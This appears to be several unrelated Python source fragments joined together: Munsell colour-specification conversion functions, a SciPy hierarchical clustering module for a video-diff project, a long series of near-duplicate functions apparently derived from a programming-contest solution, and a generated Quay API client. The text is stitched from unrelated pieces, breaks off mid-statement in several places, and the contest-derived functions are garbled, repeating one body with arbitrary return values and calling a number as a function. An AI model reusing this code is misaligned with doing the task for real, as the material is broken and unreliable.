except ValueError:
return False
def bounding_hues_from_renotation(hue_and_code: ArrayLike) -> NDArray:
"""
Return for a given *Munsell* *Colorlab* specification hue and *Munsell*
*Colorlab* specification code the two bounding hues from
*Munsell Renotation System* data.
Parameters
----------
hue_and_code
*Munsell* *Colorlab* specification hue and *Munsell* *Colorlab*
specification code.
Returns
-------
:class:`numpy.ndarray`
Bounding hues.
References
----------
:cite:`Centore2014o`
Examples
--------
>>> bounding_hues_from_renotation([3.2, 4])
array([[ 2.5, 4. ],
[ 5. , 4. ]])
# Coverage Doctests
>>> bounding_hues_from_renotation([0.0, 1])
array([[ 10., 2.],
[ 10., 2.]])
"""
hue, code = as_float_array(hue_and_code)
hue_cw: Floating
code_cw: Floating
hue_ccw: Floating
code_ccw: Floating
if hue % 2.5 == 0:
if hue == 0:
hue_cw = 10
code_cw = (code + 1) % 10
else:
hue_cw = hue
code_cw = code
hue_ccw = hue_cw
code_ccw = code_cw
else:
hue_cw = 2.5 * np.floor(hue / 2.5)
hue_ccw = (hue_cw + 2.5) % 10
if hue_ccw == 0:
hue_ccw = 10
if hue_cw == 0:
hue_cw = 10
code_cw = (code + 1) % 10
if code_cw == 0:
code_cw = 10
else:
code_cw = code
code_ccw = code
return as_float_array([(hue_cw, code_cw), (hue_ccw, code_ccw)])
def hue_to_hue_angle(hue_and_code: ArrayLike) -> Floating:
"""
Convert from the *Munsell* *Colorlab* specification hue and *Munsell*
*Colorlab* specification code to hue angle in degrees.
Parameters
----------
hue_and_code
*Munsell* *Colorlab* specification hue and *Munsell* *Colorlab*
specification code.
Returns
-------
:class:`numpy.floating`
Hue angle in degrees.
References
----------
:cite:`Centore2014s`
Examples
--------
>>> hue_to_hue_angle([3.2, 4])
65.5
"""
hue, code = as_float_array(hue_and_code)
single_hue = ((17 - code) % 10 + (hue / 10) - 0.5) % 10
hue_angle = LinearInterpolator(
[0, 2, 3, 4, 5, 6, 8, 9, 10], [0, 45, 70, 135, 160, 225, 255, 315, 360]
)(single_hue)
return as_float_scalar(hue_angle)
def hue_angle_to_hue(hue_angle: Floating) -> NDArray:
"""
Convert from hue angle in degrees to the *Munsell* *Colorlab*
specification hue and code.
Parameters
----------
hue_angle
Hue angle in degrees.
Returns
-------
:class:`numpy.ndarray`
(*Munsell* *Colorlab* specification hue, *Munsell* *Colorlab*
specification code).
References
----------
:cite:`Centore2014t`
Examples
--------
>>> hue_angle_to_hue(65.54) # doctest: +ELLIPSIS
array([ 3.216, 4. ])
"""
single_hue = LinearInterpolator(
[0, 45, 70, 135, 160, 225, 255, 315, 360], [0, 2, 3, 4, 5, 6, 8, 9, 10]
)(hue_angle)
if single_hue <= 0.5:
code = 7
elif single_hue <= 1.5:
code = 6
elif single_hue <= 2.5:
code = 5
elif single_hue <= 3.5:
code = 4
elif single_hue <= 4.5:
code = 3
elif single_hue <= 5.5:
code = 2
elif single_hue <= 6.5:
code = 1
elif single_hue <= 7.5:
code = 10
elif single_hue <= 8.5:
code = 9
elif single_hue <= 9.5:
code = 8
else:
code = 7
hue = (10 * (single_hue % 1) + 5) % 10
if hue == 0:
hue = 10
return tstack([hue, code])
def hue_to_ASTM_hue(hue_and_code) -> Floating:
"""
Convert from the *Munsell* *Colorlab* specification hue and *Munsell*
*Colorlab* specification codeto *ASTM* hue number.
Parameters
----------
hue_and_code
*Munsell* *Colorlab* specification hue and *Munsell* *Colorlab*
specification code.
Returns
-------
:class:`numpy.floating`
*ASTM* hue number.
References
----------
:cite:`Centore2014k`
Examples
--------
>>> hue_to_ASTM_hue([3.2, 4]) # doctest: +ELLIPSIS
33.2...
"""
hue, code = as_float_array(hue_and_code)
ASTM_hue = 10 * ((7 - code) % 10) + hue
return 100 if ASTM_hue == 0 else ASTM_hue
def interpolation_method_from_renotation_ovoid(
specification: ArrayLike,
) -> Optional[Literal["Linear", "Radial"]]:
"""
Return whether to use linear or radial interpolation when drawing ovoids
through data points in the *Munsell Renotation System* data from given
specification.
Parameters
----------
specification
*Munsell* *Colorlab* specification.
Returns
-------
:py:data:`None` or :class:`str`
Interpolation method.
References
----------
:cite:`Centore2014l`
Examples
--------
>>> interpolation_method_from_renotation_ovoid([2.5, 5.0, 12.0, 4])
'Radial'
"""
specification = normalise_munsell_specification(specification)
interpolation_methods: Dict[
Integer, Optional[Literal["Linear", "Radial"]]
] = {
0: None,
1: "Linear",
2: "Radial",
}
if is_grey_munsell_colour(specification):
# No interpolation needed for grey colours.
interpolation_method = 0
else:
hue, value, chroma, code = specification
attest(
0 <= value <= 10,
f'"{specification}" specification value must be normalised to '
f"domain [0, 10]!",
)
attest(
is_integer(value),
f'"{specification}" specification value must be an integer!',
)
value = round(value)
attest(
2 <= chroma <= 50,
f'"{specification}" specification chroma must be normalised to '
f"domain [2, 50]!",
)
attest(
abs(2 * (chroma / 2 - round(chroma / 2))) <= INTEGER_THRESHOLD,
f'"{specification}" specification chroma must be an integer and '
f"multiple of 2!",
)
chroma = 2 * round(chroma / 2)
interpolation_method = 0
# Standard Munsell Renotation System hue, no interpolation needed.
if hue % 2.5 == 0:
interpolation_method = 0
ASTM_hue = hue_to_ASTM_hue([hue, code])
if value == 1:
if chroma == 2:
if 15 < ASTM_hue < 30 or 60 < ASTM_hue < 85:
interpolation_method = 2
else:
interpolation_method = 1
elif chroma == 4:
if 12.5 < ASTM_hue < 27.5 or 57.5 < ASTM_hue < 80:
interpolation_method = 2
else:
interpolation_method = 1
elif chroma == 6:
if 55 < ASTM_hue < 80:
interpolation_method = 2
else:
interpolation_method = 1
elif chroma == 8:
if 67.5 < ASTM_hue < 77.5:
interpolation_method = 2
else:
interpolation_method = 1
elif chroma >= 10:
# NOTE: This condition is likely never "True" while producing a
# valid "Munsell Specification" in practice: 1M iterations with
# random numbers never reached this code path while producing a
# valid "Munsell Specification".
if 72.5 < ASTM_hue | |
<reponame>NeTatsu/video-diff<filename>Python/Clustering.py
"""
The most efficient would be to use OpenCV's
cv::flann::hierarchicalClustering .
But we do NOT have Python bindings to it.
See if you have the time:
http://opencvpython.blogspot.ro/2013/01/k-means-clustering-3-working-with-opencv.html
Other ideas at:
- https://stackoverflow.com/questions/1793532/how-do-i-determine-k-when-using-k-means-clustering
- "Basically, you want to find a balance between two variables:
the number of clusters (k) and the average variance of the clusters."
- "First build a minimum spanning tree of your data. Removing the K-1 most expensive edges splits the tree into K clusters,
so you can build the MST once, look at cluster spacings / metrics for various K, and take the knee of the curve.
This works only for Single-linkage_clustering, but for that it's fast and easy. Plus, MSTs make good visuals."
- https://stackoverflow.com/questions/15376075/cluster-analysis-in-r-determine-the-optimal-number-of-clusters
https://en.wikipedia.org/wiki/Variance
NOT useful:
http://classroom.synonym.com/calculate-average-variance-extracted-2842.html
"""
import cv2
import numpy as np
import scipy.cluster.hierarchy as sch
from matplotlib import pyplot as plt
import common
import config
colors = ['b', 'r', 'g', 'y', "w", "magenta", "brown", "pink", "orange", \
"purple"]
def sqr(r):
return r * r
"""
This uses SciPy - see scipy-ref.pdf, Section 3.1.1 .
I guess this is similar to cv::flann::hierarchicalClustering() .
Note: the number of clusters is dependent on the threshold var defined below.
IMPORTANT: We return only the elements from Z that are part of the MEANINGFUL
clusters obtained with hierarchicalClustering().
See if you have the time:
http://nbviewer.ipython.org/github/herrfz/dataanalysis/tree/master/data/
http://nbviewer.ipython.org/github/herrfz/dataanalysis/blob/master/week4/clustering_example.ipynb
"""
def HierarchicalClustering(Z, N):
if False:
print "Z = %s" % str(Z);
"""
Z = []
Traceback (most recent call last):
File "ReadAVI.py", line 365, in <module>
Main()
File "ReadAVI.py", line 295, in Main
res = MatchFrames.Main_img2(img2, counter2)
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 776, in Main_img2
res = match_and_draw("Image Match")
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 593, in match_and_draw
nonp1 = ClusterUnmatchedKeypoints(nonp1)
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 110, in ClusterUnmatchedKeypoints
Z = Clustering.HierarchicalClustering(Z, N)
File "/home/alexsusu/drone-diff/02/Clustering.py", line 64, in HierarchicalClustering
dSch = sch.distance.pdist(Z)
File "/usr/lib/python2.7/dist-packages/scipy/spatial/distance.py", line 1173, in pdist
raise ValueError('A 2-dimensional array must be passed.')
ValueError: A 2-dimensional array must be passed.
Z = [[ 265. 127.]]
Traceback (most recent call last):
File "ReadAVI.py", line 365, in <module>
Main()
File "ReadAVI.py", line 295, in Main
res = MatchFrames.Main_img2(img2, counter2)
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 776, in Main_img2
res = match_and_draw("Image Match")
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 593, in match_and_draw
nonp1 = ClusterUnmatchedKeypoints(nonp1)
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 110, in ClusterUnmatchedKeypoints
Z = Clustering.HierarchicalClustering(Z, N)
File "/home/alexsusu/drone-diff/02/Clustering.py", line 65, in HierarchicalClustering
dSch = sch.distance.pdist(Z)
File "/usr/lib/python2.7/dist-packages/scipy/spatial/distance.py", line 1173, in pdist
raise ValueError('A 2-dimensional array must be passed.')
ValueError: A 2-dimensional array must be passed.
Z = [[ 430. 61. ]
[ 265. 127. ]
[ 300. 79. ]
[ 481. 54. ]
[ 450.00003052 91.20000458]
[ 327.62884521 143.07841492]
[ 261.27365112 99.53282166]
[ 292.62652588 119.43939209]
[ 313.52841187 152.28521729]
[ 358.31817627 101.52348328]]
Traceback (most recent call last):
File "ReadAVI.py", line 365, in <module>
Main()
File "ReadAVI.py", line 295, in Main
res = MatchFrames.Main_img2(img2, counter2)
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 776, in Main_img2
res = match_and_draw("Image Match")
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 593, in match_and_draw
nonp1 = ClusterUnmatchedKeypoints(nonp1)
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 110, in ClusterUnmatchedKeypoints
Z = Clustering.HierarchicalClustering(Z, N)
File "/home/alexsusu/drone-diff/02/Clustering.py", line 145, in HierarchicalClustering
numElems[e] += 1
IndexError: list index out of range
"""
if False:
Z = [[ 430., 61. ],
[ 265., 127. ],
[ 300., 79. ],
[ 481., 54. ],
[ 450.00003052, 91.20000458],
[ 327.62884521, 143.07841492],
[ 261.27365112, 99.53282166],
[ 292.62652588, 119.43939209],
[ 313.52841187, 152.28521729],
[ 358.31817627, 101.52348328]];
N = len(Z);
common.DebugPrint("HierarchicalClustering(): N = %d" % N);
# Note: Z is not standard list, but a numpy array
if len(Z) < 10: #or Z == []:
common.DebugPrint("HierarchicalClustering(): Bailing out of hierarchical " \
"clustering since too few elements provided (and I guess we" \
"could have issues)");
return [];
# Vector of (N choose 2) pairwise Euclidian distances
dSch = sch.distance.pdist(Z);
dMax = dSch.max();
if False:
common.DebugPrint("Z = %s" % str(Z));
# This parameter is CRUCIAL for the optimal number of clusters generated
#threshold = 0.1 * dMax;
threshold = 0.05 * dMax; # This parameter works better for the videos from Lucian
"""
I did not find much information on the linkage matrix (linkageMatrix), but
from my understanding it is the direct result of the hierarchical
clustering, which is performed by recursively splitting clusters,
forming a dendrogram forest of trees (see if you have time
https://stackoverflow.com/questions/5461357/hierarchical-k-means-in-opencv-without-knowledge-of-k
"a forest of hierarchical clustering trees").
The linkage matrix is stores on each row data for a clustered point:
- the last element in the row is the leaf in the dendrogram tree forrest
the point belongs to. The leaf does not really tell you to which
final cluster the point belongs to - (IMPORTANT) for this, we
have the function sch.fcluster().
See if you have the time (for some better understanding):
https://stackoverflow.com/questions/11917779/how-to-plot-and-annotate-hierarchical-clustering-dendrograms-in-scipy-matplotlib
See doc:
http://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.linkage.html#scipy.cluster.hierarchy.linkage
See if you have the time:
https://stackoverflow.com/questions/16883412/how-do-i-get-the-subtrees-of-dendrogram-made-by-scipy-cluster-hierarchy
"""
linkageMatrix = sch.linkage(dSch, "single");
common.DebugPrint("linkageMatrix = %s" % str(linkageMatrix));
# Inspired from https://stackoverflow.com/questions/7664826/how-to-get-flat-clustering-corresponding-to-color-clusters-in-the-dendrogram-cre
indexCluster = sch.fcluster(linkageMatrix, threshold, "distance");
common.DebugPrint("indexCluster = %s" % str(indexCluster));
cMax = -1;
numElems = [0] * (N + 1); # We "truncate" later the ending zeros from numElems
# IMPORTANT: It appears the ids of the clusters start from 1, not 0
for e in indexCluster:
#print "e = %s" % str(e)
numElems[e] += 1;
if cMax < e:
cMax = e;
#cMax += 1
# cMax is the MAXIMUM optimal number of clusters after the Hierarchical clustering
common.DebugPrint("cMax (the MAX id of final clusters) = %d" % cMax);
numElems = numElems[0 : cMax + 1];
common.DebugPrint("numElems = %s" % str(numElems));
"""
# We can also use:
numElems.__delslice__(cMax + 1, len(numElems))
but it's sort of deprecated
- see http://docs.python.org/release/2.5.2/ref/sequence-methods.html
"""
numClusters = 0;
for e in numElems:
if e != 0:
numClusters += 1;
common.DebugPrint("numClusters (the optimal num of clusters) = %d" % \
numClusters);
assert numClusters == cMax;
numClustersAboveThreshold = 0;
for i in range(cMax + 1):
if numElems[i] >= \
config.THRESHOLD_NUM_NONMATCHED_ELEMENTS_IN_CLUSTER:
common.DebugPrint("numElems[%d] = %d" % (i, numElems[i]));
numClustersAboveThreshold += 1;
common.DebugPrint("numClustersAboveThreshold = %d" % \
numClustersAboveThreshold)
RETURN_ONLY_BIGGEST_CLUSTER = False; #True;
if RETURN_ONLY_BIGGEST_CLUSTER == True:
# !!!!TODO: find biggest cluster - sort them after numElems, etc
res = [];
for i in range(N):
if indexCluster[i] == numClusters: # We start numbering the clusters from 1
res.append(Z[i]);
else:
if False:
# We return only the elements from the MEANINGFUL clusters
res = [];
for i in range(N):
if numElems[indexCluster[i]] >= \
config.THRESHOLD_NUM_NONMATCHED_ELEMENTS_IN_CLUSTER:
res.append(Z[i]);
else:
res = {};
for i in range(N):
if numElems[indexCluster[i]] >= \
config.THRESHOLD_NUM_NONMATCHED_ELEMENTS_IN_CLUSTER:
if indexCluster[i] not in res:
res[indexCluster[i]] = [];
res[indexCluster[i]].append(Z[i]);
if config.USE_GUI and config.DISPLAY_PYTHON_CLUSTERING:
# We clear the figure and the axes
plt.clf();
plt.cla();
# Plot the data
for i in range(N): #indexCluster:
#print "Z[i, 0] = %.2f, Z[i, 1] = %.2f" % (Z[i, 0], Z[i, 1])
if False:
# We plot only the "interesting" clusters
if numElems[indexCluster[i]] >= \
config.THRESHOLD_NUM_NONMATCHED_ELEMENTS_IN_CLUSTER:
plt.scatter(Z[i, 0], Z[i, 1], c=colors[indexCluster[i]]);
else:
try:
colCluster = colors[indexCluster[i]];
except: # IndexError: list index out of range
colCluster = 2;
plt.scatter(Z[i, 0], Z[i, 1], c=colCluster)
plt.xlabel("Height. (numClusters = %d, numClustersAboveThreshold = %d)" % \
(numClusters, numClustersAboveThreshold));
plt.ylabel("Weight");
# From http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.axis
v = plt.axis();
# We invert the y to have 0 up and x axis to have 0
v = (0, v[1], v[3], 0);
#plt.gca().invert_yaxis()
plt.axis(v);
plt.show();
if False:
plt.savefig("plot-%s.png" % (prefix));
if False:
sch.dendrogram(linkageMatrix,
truncate_mode='lastp',
color_threshold=1,
show_leaf_counts=True)
plt.show();
if False:
plt.savefig("plot-%s.png" % (prefix));
return res;
"""
This uses Python and OpenCV's cv2 module.
Note: unfortunately, cv::flann::hierarchicalClustering()
doesn't have Python bindings, so we have to sort of
implement it :) .
"""
def HierarchicalClusteringWithCV2_UNFINISHED(Z, N):
#X = np.random.randint(25,50,(25,2))
#Y = np.random.randint(60,85,(25,2))
#Z = np.vstack((X, Y))
# We choose an ~optimal number of clusters
#k = 4
minValidity = 1000000
minValidityK = -1
for k in range(2, 10 + 1):
A = [None] * k
#avg = [0] * k
"""
Inspired a bit from
https://www.google-melange.com/gsoc/project/google/gsoc2013/abidrahman2/43002,
\source\py_tutorials\py_ml\py_kmeans\py_kmeans_opencv\py_kmeans_opencv.rst
"""
# Define criteria and apply kmeans()
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
t1 = float(cv2.getTickCount())
#ret, label, center = cv2.kmeans(Z, 2, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
ret, label, center = cv2.kmeans(Z, k, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
| |
1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S
return t
def func_891713351c9841cb9268514a5296b1c2(N, D):
S = sum(D)
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S
return A
def func_78ded00109c14957aa3d3ec9c29786d9(N, D):
S = sum(D)
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S
return S
def func_50d651b599f94fb9ab8fddaae5928de5(N, D):
S = sum(D)
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S
return ans
def func_8aeea14840a6415ab51f28c509c95a64(N, D):
S = sum(D)
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S
return a
def func_1ef869d3b1944dd985faa504aa34695d(N, D):
S = sum(D)
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S
return C
def func_10ce8592aad748f59dc974c93ae5fac8(test, N, D, S):
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S('Case #%s: %.16f' % (test + 1, ans))
return p
def func_fd421d4abf4547c4a718479f3c9a3eef(test, N, D, S):
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S('Case #%s: %.16f' % (test + 1, ans))
return t
def func_dfce3f9b3d79451786574d15c3d0fea8(test, N, D, S):
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S('Case #%s: %.16f' % (test + 1, ans))
return C
def func_3ebe0d54479249e08e7171e9a9f7f4f3(test, N, D, S):
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S('Case #%s: %.16f' % (test + 1, ans))
return b
def func_4ce6f82c02e94d1598a2ba1f86f1d06c(test, N, D, S):
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S('Case #%s: %.16f' % (test + 1, ans))
return ans
def func_2ef82ccb538a48659576eeff63cca899(test, N, D, S):
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S('Case #%s: %.16f' % (test + 1, ans))
return A
def func_747f475b4bff402f9453b4185b726016(test, N, D, S):
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S('Case #%s: %.16f' % (test + 1, ans))
return a
def func_dbb0b112a7474c09a481f489f763e9db(test, N, D, S):
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S('Case #%s: %.16f' % (test + 1, ans))
return B
def func_563f732d2574488bbcf6fa4ee9fffe08(infile):
N, p, q, r, s = map(int, infile.readline().split())
D = [((i * p + q) % r + s) for i in range(N)]
S = sum(D)
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += | |
# coding: utf-8
"""
Quay Frontend
This API allows you to perform many of the operations required to work with Quay repositories, users, and organizations. You can find out more at <a href=\"https://quay.io\">Quay</a>. # noqa: E501
OpenAPI spec version: v1
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from quay.api_client import ApiClient
class UserApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_star(self, body, **kwargs): # noqa: E501
"""create_star # noqa: E501
Star a repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_star(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param NewStarredRepository body: Request body contents. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_star_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_star_with_http_info(body, **kwargs) # noqa: E501
return data
def create_star_with_http_info(self, body, **kwargs): # noqa: E501
"""create_star # noqa: E501
Star a repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_star_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param NewStarredRepository body: Request body contents. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_star" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_star`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_implicit'] # noqa: E501
return self.api_client.call_api(
'/api/v1/user/starred', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_star(self, repository, **kwargs): # noqa: E501
"""delete_star # noqa: E501
Removes a star from a repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_star(repository, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str repository: The full path of the repository. e.g. namespace/name (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_star_with_http_info(repository, **kwargs) # noqa: E501
else:
(data) = self.delete_star_with_http_info(repository, **kwargs) # noqa: E501
return data
def delete_star_with_http_info(self, repository, **kwargs): # noqa: E501
"""delete_star # noqa: E501
Removes a star from a repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_star_with_http_info(repository, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str repository: The full path of the repository. e.g. namespace/name (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['repository'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_star" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'repository' is set
if ('repository' not in params or
params['repository'] is None):
raise ValueError("Missing the required parameter `repository` when calling `delete_star`") # noqa: E501
collection_formats = {}
path_params = {}
if 'repository' in params:
path_params['repository'] = params['repository'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_implicit'] # noqa: E501
return self.api_client.call_api(
'/api/v1/user/starred/{repository}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_logged_in_user(self, **kwargs): # noqa: E501
"""get_logged_in_user # noqa: E501
Get user information for the authenticated user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_logged_in_user(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: UserView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_logged_in_user_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_logged_in_user_with_http_info(**kwargs) # noqa: E501
return data
def get_logged_in_user_with_http_info(self, **kwargs): # noqa: E501
"""get_logged_in_user # noqa: E501
Get user information for the authenticated user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_logged_in_user_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: UserView
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_logged_in_user" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_implicit'] # noqa: E501
return self.api_client.call_api(
'/api/v1/user/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserView', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user_information(self, username, **kwargs): # noqa: E501
"""get_user_information # noqa: E501
Get user information for the specified user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_information(username, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
